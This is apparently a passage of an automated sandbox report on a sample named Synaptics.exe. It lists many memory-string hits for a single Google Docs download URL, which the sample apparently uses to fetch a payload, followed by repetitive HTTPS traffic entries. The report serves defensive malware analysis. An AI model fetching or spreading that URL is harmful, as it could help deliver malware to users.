                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoog
                              Source: Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgooglF
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgv
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3027046718.0000000013D7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3059786845.0000000025CFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadha.ne.K
                              Source: Synaptics.exe, 00000003.00000002.3033199264.000000001887E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3021583271.0000000012E7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3022930792.000000001323E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3029865126.0000000015DFE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhb
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhe
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhf
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadicnpfE
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadigEGE
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin-O
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin8
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadit
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.j
                              Source: Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj7cF$
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk-cnuK
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk.cnhK
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk9
                              Source: Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk?3F
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkKpE
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlaNE
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle.co
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleD
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleni
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniw
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlevaN
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlezt
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadll
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadll-vh
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlvvkwFh#
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlx
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm3
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme7
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeftgEe
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmx(
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmxe
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn0gE
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn;
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadname
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncisc
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnet
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetleB
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetleniyor...
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadni
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniW
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnirjsG.0
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnn
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnt.go
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnw
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado.ZpRE
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado.gl
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado1
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado1W
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadocook
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom.t
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadon
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadonte
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
